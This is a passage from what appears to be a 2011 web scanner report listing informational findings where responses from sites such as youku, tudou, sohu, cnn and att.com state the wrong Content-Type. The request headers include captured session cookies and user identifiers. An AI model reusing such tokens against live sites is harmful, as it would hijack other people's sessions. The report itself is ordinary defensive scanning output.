Last-Modified: Mon, 14 Mar 2011 09:58:54 GMT
ETag: "3787019674"
Content-Type: text/javascript
Content-Length: 21031
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:48:52 GMT
Server: staticdg48

function ltrim(s){ return s.replace( /^(\s*|...*)/, ""); }
function rtrim(s){ return s.replace( /(\s*|...*)$/, ""); }
function trim(s){ return ltrim(rtrim(s));}
/**
* ........................
...[SNIP]...

20.32. http://static.youku.com/v1.0.0687/index/js/header.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.youku.com
Path:   /v1.0.0687/index/js/header.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /v1.0.0687/index/js/header.js HTTP/1.1
Host: static.youku.com
Proxy-Connection: keep-alive
Referer: http://www.youku.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 18:46:55 GMT
Cache-Control: max-age=93312000
Vary: Accept-Encoding
Last-Modified: Mon, 20 Jun 2011 09:21:56 GMT
ETag: "3236557483"
Content-Type: text/javascript
Content-Length: 12895
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:46:55 GMT
Server: staticdg48

var MiniHeader = {
   isrepeat:0,
   username:'',
   theme: {
       'cookiename': 'indextheme',
       'cookieoption': {'expires': 365},
       'index': null,
       'option': null,
       'cssdom': null,
       'cssfile': [

...[SNIP]...

20.33. http://static.youku.com/v1.0.0687/index/js/playlist.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.youku.com
Path:   /v1.0.0687/index/js/playlist.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /v1.0.0687/index/js/playlist.js HTTP/1.1
Host: static.youku.com
Proxy-Connection: keep-alive
Referer: http://www.youku.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 18:49:37 GMT
Cache-Control: max-age=93312000
Vary: Accept-Encoding
Last-Modified: Mon, 01 Aug 2011 09:21:37 GMT
ETag: "623743511"
Content-Type: text/javascript
Content-Length: 15551
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:49:37 GMT
Server: staticdg48

//{{{class define
function item(){
   this.videoid="";
}
function PlayList(){}
PlayList.imageQls=new Image;
PlayList.cacheTag= new Array();
PlayList.imageQls.src="http://static.youku.com/v/img/qls.gif";
...[SNIP]...

20.34. http://static.youku.com/v1.0.0687/index/js/searchprompt.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.youku.com
Path:   /v1.0.0687/index/js/searchprompt.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /v1.0.0687/index/js/searchprompt.js HTTP/1.1
Host: static.youku.com
Proxy-Connection: keep-alive
Referer: http://www.youku.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 18:47:05 GMT
Cache-Control: max-age=93312000
Vary: Accept-Encoding
Last-Modified: Mon, 19 Apr 2010 09:31:15 GMT
ETag: "1051120069"
Content-Type: text/javascript
Content-Length: 8845
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:47:05 GMT
Server: staticdg48

var lastindex=-1;
var search_prompt_flag=false;
var listlength=0;
function StringBuffer(){this.data=[];}
StringBuffer.prototype.append=function(){this.data.push(arguments[0]);return this;}
Stri
...[SNIP]...

20.35. http://static.youku.com/v1.0.0687/topic/js/QIndex.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.youku.com
Path:   /v1.0.0687/topic/js/QIndex.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /v1.0.0687/topic/js/QIndex.js HTTP/1.1
Host: static.youku.com
Proxy-Connection: keep-alive
Referer: http://www.youku.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 18:47:08 GMT
Cache-Control: max-age=93312000
Vary: Accept-Encoding
Last-Modified: Mon, 27 Jun 2011 09:14:58 GMT
ETag: "1376547893"
Content-Type: text/javascript
Content-Length: 13280
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:47:08 GMT
Server: staticdg48

/**
* ............ js ......
*/
var IndexEvent = Class.create();
IndexEvent.prototype = {
   initialize: function() {},
   /**
* ...........................
*/
   userInter : function(eventHandl
...[SNIP]...

20.36. http://v2.tudou.com/tdct/commonadv.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://v2.tudou.com
Path:   /tdct/commonadv.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /tdct/commonadv.html?date=8-15-13&jsoncallback=adExtension.callback&areaCode=0&positionId=4101 HTTP/1.1
Host: v2.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0
Vary: Accept-Encoding
Content-Type: text/html;charset=GBK
Date: Mon, 15 Aug 2011 18:56:09 GMT
X-Cache: MISS from adextensioncontrol.tudou.com
Content-Length: 77458

adExtension.callback({"mulSel":[],"commonAdvReturnEntityList":[{"textContent":"","isMulSel":0,"seedFlashTitle":"","ownerId":"100203","thirdPartClick":"","specialTime":0,"mustShowFlag":0,"videoList":[{
...[SNIP]...

20.37. http://www.ask.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ask.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Content-Length: 1150
Last-Modified: Tue, 03 May 2011 18:31:14 GMT
ETag: "233e26-47e-4a2635850e080"
Accept-Ranges: bytes
Date: Mon, 15 Aug 2011 18:28:03 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

20.38. http://www.cnn.com/cnn_adspaces/3.0/homepage/main/bot1.120x90.ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cnn.com
Path:   /cnn_adspaces/3.0/homepage/main/bot1.120x90.ad

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /cnn_adspaces/3.0/homepage/main/bot1.120x90.ad HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:58 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Fri, 29 Oct 2010 02:19:20 GMT
Accept-Ranges: bytes
Content-Length: 581
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Content-Type: text/plain
Connection: close

<!-- ADSPACE: homepage/main/bot1.120x90 -->


<!-- CALLOUT|http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs|
...[SNIP]...

20.39. http://www.cnn.com/cnn_adspaces/3.0/homepage/spon2.126x31.ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cnn.com
Path:   /cnn_adspaces/3.0/homepage/spon2.126x31.ad

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /cnn_adspaces/3.0/homepage/spon2.126x31.ad HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; CG=US:--:--; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Fri, 29 Oct 2010 02:19:20 GMT
Accept-Ranges: bytes
Content-Length: 579
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:45:23 GMT
Content-Type: text/plain
Connection: close

<!-- ADSPACE: homepage/spon2.126x31 -->


<!-- CALLOUT|http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs|CAL
...[SNIP]...

20.40. http://www.ipraction.cn/library/column/2011/07/04/C30830/style/base.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ipraction.cn
Path:   /library/column/2011/07/04/C30830/style/base.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /library/column/2011/07/04/C30830/style/base.css HTTP/1.1
Host: www.ipraction.cn
Proxy-Connection: keep-alive
Referer: http://www.ipraction.cn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 10 Jul 2011 23:59:27 GMT
ETag: "1d5046c-26d2-4a7bfdb55154e"
Accept-Ranges: bytes
X-UA-Compatible: IE=EmulateIE7
Content-Length: 9938
Content-Type: text/css
Cache-Control: max-age=10
Expires: Mon, 15 Aug 2011 18:25:07 GMT
Date: Mon, 15 Aug 2011 18:24:57 GMT
Connection: close
Vary: Accept-Encoding

@charset "utf-8";

body, div, p, ul, ol, dl, dt, dd, li, form, input, table, img,
h1, h2, h3, h4, h5, h6{margin:0; padding:0;}

body{
background:#fff none; color:#333; font-size:12px; font-styl
...[SNIP]...

20.41. http://www.sohu.com/upload/js/tuiguang_sohu_full_qq.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sohu.com
Path:   /upload/js/tuiguang_sohu_full_qq.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /upload/js/tuiguang_sohu_full_qq.js HTTP/1.1
Host: www.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Connection: keep-alive
Date: Mon, 15 Aug 2011 17:36:34 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 15 Aug 2011 18:36:34 GMT
Last-Modified: Wed, 13 Apr 2011 09:57:15 GMT
Content-Length: 4548
FSS-Cache: HIT from 30540418.37421890.41573355
Accept-Ranges: bytes

var sogou_se_dt = new Date();
var sogou_se_t = sogou_se_dt.getTime();
var sogou_se_date = sogou_se_dt.getFullYear() +""+ sogou_se_dt.getMonth() +""+ sogou_se_dt.getDate();
function sogou_se_getcookie
...[SNIP]...

20.42. http://www.sohu.com/upload/style/global1212.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sohu.com
Path:   /upload/style/global1212.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /upload/style/global1212.css HTTP/1.1
Host: www.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:24:10 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 15 Aug 2011 18:29:10 GMT
Last-Modified: Fri, 12 Dec 2008 03:14:13 GMT
Content-Length: 3485
FSS-Cache: HIT from 30474881.37290817.41507817
Accept-Ranges: bytes

/* ....CSS.... */
body{font-family:'....';text-align:center;margin:0 auto;padding:0;background:#FFF;font-size:12px;color:#333;}
body > div{text-align:center;margin-right:auto;margin-left:auto;}
di
...[SNIP]...

20.43. http://www.sohu.com/upload/style/layout091102.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sohu.com
Path:   /upload/style/layout091102.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /upload/style/layout091102.css HTTP/1.1
Host: www.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:20:21 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 15 Aug 2011 18:25:21 GMT
Last-Modified: Thu, 05 Nov 2009 09:03:01 GMT
Content-Length: 3937
FSS-Cache: HIT from 30474881.37290817.41507817
Accept-Ranges: bytes

/*Layout.css ............*/
.Area{width:950px;clear:both;height:auto;margin:0px auto;}

/* CSS.... */
.blank1{margin:0 auto;height:1px;font-size:1px;clear:both;}
.blank2{margin:0 auto;height:2px;
...[SNIP]...

20.44. http://www.sohu.com/upload/style/style110805.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sohu.com
Path:   /upload/style/style110805.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /upload/style/style110805.css HTTP/1.1
Host: www.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:23:22 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 15 Aug 2011 18:28:22 GMT
Last-Modified: Fri, 05 Aug 2011 06:09:59 GMT
Content-Length: 32546
FSS-Cache: HIT from 30474881.37290817.41507817
Accept-Ranges: bytes

/* ...... & .... */
#loginNav{height:22px;margin:0 auto 0;}
/* ...... */
#loginPP{width:500px;float:left;color:#000;}
/*........*/
#setIndex{width:120px;float:left;margin:6px 2px 0px 5px;}
#setI
...[SNIP]...

20.45. http://www.soso.com/wh.q  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.soso.com
Path:   /wh.q

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /wh.q?w=x HTTP/1.1
Host: www.soso.com
Proxy-Connection: keep-alive
Referer: http://www.soso.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_pvid=9085923014; pgv_flv=10.3 r183; pgv_info=pgvReferrer=&ssid=s8020529487

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:24:42 GMT
Content-Type: text/html;charset=GBK
Connection: keep-alive
Expires: Mon, 15 Aug 2011 18:34:42 GMT
Vary: Accept-Encoding
Content-Length: 103

0    ......    0
0    ....    0
0    ....    0
0    ....    0
0    ......    0
0    ......    0
0    ......    0
0    ......    0
0    ......    0
0    ......    0

20.46. http://www.tudou.com/my/tui/getFreshActMsg.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tudou.com
Path:   /my/tui/getFreshActMsg.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /my/tui/getFreshActMsg.html?datePoint=0&pageSize=8&uid=0&limit=0 HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:56:05 GMT
Content-Type: text/html;charset=utf-8
Connection: close
appSrv: unkown
Vary: Accept-Encoding
P3P: CP=CAO PSA OUR
Pragma: No-Cache
Cache-Control: No-Cache;No-Store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7862
nnCoection: close

{"timestamp":1313434565046,"total":501,"actmsg":[{"dt":1313434483000,"status":1,"ownerId":90718696,"ownerType":7,"targetId":94638480,"retNum":0,"type":3,"txt":"...............~","id":1313434483938616,
...[SNIP]...

20.47. http://www.tudou.com/my/tui/getOfficialVuserForSub.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tudou.com
Path:   /my/tui/getOfficialVuserForSub.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /my/tui/getOfficialVuserForSub.html?pageSize=20&page=1 HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:56:08 GMT
Content-Type: text/html;charset=utf-8
Connection: close
appSrv: unkown
Vary: Accept-Encoding
P3P: CP=CAO PSA OUR
Pragma: No-Cache
Cache-Control: No-Cache;No-Store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 5009

{"timestamp":1313434568497,"page":1,"remains":true,"status":1,"pageSize":20,"user":[{"username":"_88570093","nickname":"...........................","subedNum":3264,"userId":88570093,"actNum":77,"user
...[SNIP]...

20.48. http://www.tudou.com/my/tui/multyCheckSub.srv  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tudou.com
Path:   /my/tui/multyCheckSub.srv

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /my/tui/multyCheckSub.srv?callback=jsonp1313434616913&_=1313434617160&users=300386%2C40360632%2C65873172%2C7717859%2C52241294%2C87097239%2C90492723%2C46413900%2C89818353%2C90492859 HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:56:05 GMT
Content-Type: text/html;charset=utf-8
Connection: close
appSrv: unkown
Vary: Accept-Encoding
P3P: CP=CAO PSA OUR
Pragma: No-Cache
Cache-Control: No-Cache;No-Store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 55
nnCoection: close

jsonp1313434616913({"status":-1,"msg":"need to login"})

20.49. http://www.tudou.com/util/tools/www_hd.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tudou.com
Path:   /util/tools/www_hd.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /util/tools/www_hd.txt HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:56:01 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:05:00 GMT
Content-Length: 27
Expires: Mon, 15 Aug 2011 20:56:01 GMT
Cache-Control: max-age=7200
X-Cache: HIT from www.tudou.com

_initHeader({pc:55760762});

20.50. http://www.wireless.att.com/cell-phone-service/dwr/interface/DWRRequestManager.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/dwr/interface/DWRRequestManager.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /cell-phone-service/dwr/interface/DWRRequestManager.js?2011-08-15-03-37-25 HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966; TLTHID=31A640C8C76B10C7A09DCAEB2DFC8A0E; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3937
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=900
Date: Mon, 15 Aug 2011 18:20:05 GMT
Connection: close


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (DWRRequestManager == null) var
...[SNIP]...

20.51. http://www.wireless.att.com/cell-phone-service/images/cart/btn_close.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/images/cart/btn_close.gif

Issue detail

